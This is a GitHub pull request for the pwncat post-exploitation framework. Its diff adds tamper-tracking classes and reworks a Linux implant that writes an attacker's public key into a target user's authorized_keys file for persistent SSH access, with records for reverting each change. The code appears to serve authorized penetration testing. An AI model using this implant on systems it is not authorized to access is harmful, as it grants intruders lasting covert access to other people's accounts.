Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Methodically check existence and permissions before adding authkeys #263

Closed
wants to merge 5 commits into from
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ and simply didn't have the time to go back and retroactively create one.
- Fixed `set` command use with incorrect keys (e.g. `set invalid value`)

### Added
- Permission checks on the .ssh directory before adding authkeys, tamper module for reverts.
- Added missed `PlatformError` for `upload` command (e.g. "no gtfobins writers available")

## [0.5.4] - 2022-01-27
Expand Down
104 changes: 104 additions & 0 deletions pwncat/facts/tamper.py
Original file line number Diff line number Diff line change
Expand Up @@ -216,3 +216,107 @@ def title(self, session: "pwncat.manager.Session"):
return self._annotate_title(
session, f"created directory at [cyan]{self.path}[cyan]"
)


class ModifiedPermissions(Tamper):
"""Tracks permission changes to files and directories on the target.
The previous permissions will be set on a revert.

:param source: generating module or routine
:type source: str
:param uid: UID needed to revert
:type uid: Union[int, str]
:param path: path to replaced file
:type path: str
:param mode: original permissions on the file or directory
:type mode: int
:param timestamp: the datetime that this change occurred
:type timestamp: Optional[datetime.datetime]
"""

def __init__(
self,
source: str,
uid: Union[int, str],
path: str,
mode: int,
timestamp: Optional[datetime.datetime] = None,
):
super().__init__(source, uid, timestamp=timestamp)

self.path = path
self.mode = mode

@property
def revertable(self):
return True

def revert(self, session: "pwncat.manager.Session"):

try:
session.platform.Path(self.path).chmod(self.mode)
except FileNotFoundError:
raise ModuleFailed("file not found error")

self.reverted = True

def title(self, session: "pwncat.manager.Session"):
print(session.find_user(uid=self.uid))
return self._annotate_title(
session, f"modified permissions on [cyan]{self.path}[cyan]"
)


class ModifiedOwnership(Tamper):
"""Tracks ownership changes to files and directories on the target.
The previous ownerships will be set on a revert.

:param source: generating module or routine
:type source: str
:param uid: UID needed to revert
:type uid: Union[int, str]
:param path: path to replaced file
:type path: str
:param o_uid: UID of the original owner
:type o_uid: int
:param o_gid: GID of the original owner
:type o_gid: int
:param timestamp: the datetime that this change occurred
:type timestamp: Optional[datetime.datetime]
"""

def __init__(
self,
source: str,
uid: Union[int, str],
path: str,
o_uid: int,
o_gid: int,
timestamp: Optional[datetime.datetime] = None,
):
super().__init__(source, uid, timestamp=timestamp)

self.path = path
self.o_uid = o_uid
self.o_gid = o_gid

@property
def revertable(self):
return True

def revert(self, session: "pwncat.manager.Session"):

try:
session.platform.chown(
session.platform.Path(self.path), self.o_uid, self.o_gid
)
except (FileNotFoundError, PermissionError):
raise ModuleFailed("file not found error")

self.reverted = True

def title(self, session: "pwncat.manager.Session"):
print(session.find_user(uid=self.uid))
return self._annotate_title(
session, f"modified ownership of [cyan]{self.path}[cyan]"
)
95 changes: 55 additions & 40 deletions pwncat/modules/linux/implant/authorized_key.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,14 +5,21 @@
import pwncat
from pwncat.facts import PrivateKey
from pwncat.modules import Status, Argument, ModuleFailed
from pwncat.facts.tamper import (
CreatedFile,
ReplacedFile,
CreatedDirectory,
ModifiedOwnership,
ModifiedPermissions,
)
from pwncat.platform.linux import Linux
from pwncat.modules.implant import ImplantModule


class AuthorizedKeyImplant(PrivateKey):
"""A public key added to a user's authorized keys file"""

def __init__(self, source, user, key, pubkey):
def __init__(self, source, user, key, pubkey, tampers):
super().__init__(
source=source,
path=key,
Expand All @@ -24,6 +31,9 @@ def __init__(self, source, user, key, pubkey):

self.pubkey = pubkey

# Use this as a stack like defers in Go
self.tampers = reversed(tampers)

def title(self, session: "pwncat.manager.Session"):
"""Provide a human-readable description"""
user = session.find_user(uid=self.uid)
Expand All @@ -43,31 +53,9 @@ def remove(self, session: "pwncat.manager.Session"):
if current_user.id != self.uid and current_user.id != 0:
raise ModuleFailed(f"must be [blue]root[/blue] or [blue]{user.name}[/blue]")

# Ensure the directory exists
homedir = session.platform.Path(user.home)
if not (homedir / ".ssh").is_dir():
return

authkeys_path = homedir / ".ssh" / "authorized_keys"

if not authkeys_path.is_file():
return

try:
with authkeys_path.open("r") as filp:
authkeys = [line for line in filp.readlines() if line != self.pubkey]
except (FileNotFoundError, PermissionError) as exc:
raise ModuleFailed(str(exc)) from exc

try:
with authkeys_path.open("w") as filp:
filp.writelines(authkeys)
except (FileNotFoundError, PermissionError) as exc:
raise ModuleFailed(str(exc)) from exc

# Fix permissions (in case the file was replaced by the above write)
session.platform.chown(str(authkeys_path), user.id, user.gid)
authkeys_path.chmod(0o600)
for tamper in self.tampers:
if tamper.revertable:
tamper.revert(session)


class Module(ImplantModule):
Expand All @@ -90,13 +78,18 @@ class Module(ImplantModule):

def install(self, session: "pwncat.manager.Session", user, key):

# Keep track of all the tampers local to the module
tampers = []

yield Status("verifying user permissions")
current_user = session.current_user()
if user != "__pwncat_current__" and current_user.id != 0:
raise ModuleFailed(
"only [blue]root[/blue] can install implants for other users"
)

# Support relative paths and ones containing tilde (home directory)
key = str(pathlib.Path(key).expanduser().resolve())
if not os.path.isfile(key):
raise ModuleFailed(f"private key [blue]{key}[/blue] does not exist")

Expand All @@ -107,36 +100,47 @@ def install(self, session: "pwncat.manager.Session", user, key):
except (FileNotFoundError, PermissionError) as exc:
raise ModuleFailed(str(exc)) from exc

# Parse user name (default is current user)
if user == "__pwncat_current__":
user_info = current_user
else:
user_info = session.find_user(name=user)

# Ensure the user exists
if user_info is None:
if not (
user_info := current_user
# Parse user name (default is current user)
if user == "__pwncat_current__"
else session.find_user(name=user)
):
raise ModuleFailed(f"user [blue]{user}[/blue] does not exist")

# Ensure we haven't already installed for this user
for implant in session.run("enumerate", types=["implant.*"]):
if implant.source == self.name and implant.uid == user_info.uid:
if implant.source == self.name and implant.uid == user_info.id:
raise ModuleFailed(
f"[blue]{self.name}[/blue] already installed for [blue]{user_info.name}[/blue]"
)

# Ensure the directory exists
yield Status("locating authorized keys")
homedir = session.platform.Path(user_info.home)
if not (homedir / ".ssh").is_dir():
(homedir / ".ssh").mkdir(parents=True, exist_ok=True)
sshdir = session.platform.Path(user_info.home) / ".ssh"
if not sshdir.is_dir():
sshdir.mkdir(parents=True, exist_ok=True)
tampers.append(CreatedDirectory(self.name, user_info.id, str(sshdir)))

yield Status("fixing .ssh directory permissions")
if (mode := sshdir.stat().st_mode & 0o777) != 0o700:
sshdir.chmod(0o700)
tampers.append(
ModifiedPermissions(self.name, user_info.id, str(sshdir), mode)
)

authkeys_path = homedir / ".ssh" / "authorized_keys"
authkeys_path = sshdir / "authorized_keys"
tamper = CreatedFile(self.name, user_info.id, str(authkeys_path))

if authkeys_path.is_file():
try:
yield Status("reading authorized keys")
with authkeys_path.open("r") as filp:
authkeys = filp.readlines()
tamper = ReplacedFile(
self.name, user_info.id, str(authkeys_path), "\n".join(authkeys)
)
except (FileNotFoundError, PermissionError) as exc:
raise ModuleFailed(str(exc)) from exc
else:
Expand All @@ -149,12 +153,23 @@ def install(self, session: "pwncat.manager.Session", user, key):
yield Status("patching authorized keys")
with authkeys_path.open("w") as filp:
filp.writelines(authkeys)
tampers.append(tamper)
except (FileNotFoundError, PermissionError) as exc:
raise ModuleFailed(str(exc)) from exc

# Ensure correct permissions
yield Status("fixing authorized keys permissions")
stat = authkeys_path.stat()
uid, gid = stat.st_uid, stat.st_gid
session.platform.chown(str(authkeys_path), user_info.id, user_info.gid)
authkeys_path.chmod(0o600)
tampers.append(
ModifiedOwnership(self.name, user_info.id, str(authkeys_path), uid, gid)
)

if (mode := authkeys_path.stat().st_mode) != 0o600:
tampers.append(
ModifiedPermissions(self.name, user_info.id, str(authkeys_path), mode)
)
authkeys_path.chmod(0o600)

return AuthorizedKeyImplant(self.name, user_info, key, pubkey)
return AuthorizedKeyImplant(self.name, user_info, key, pubkey, tampers)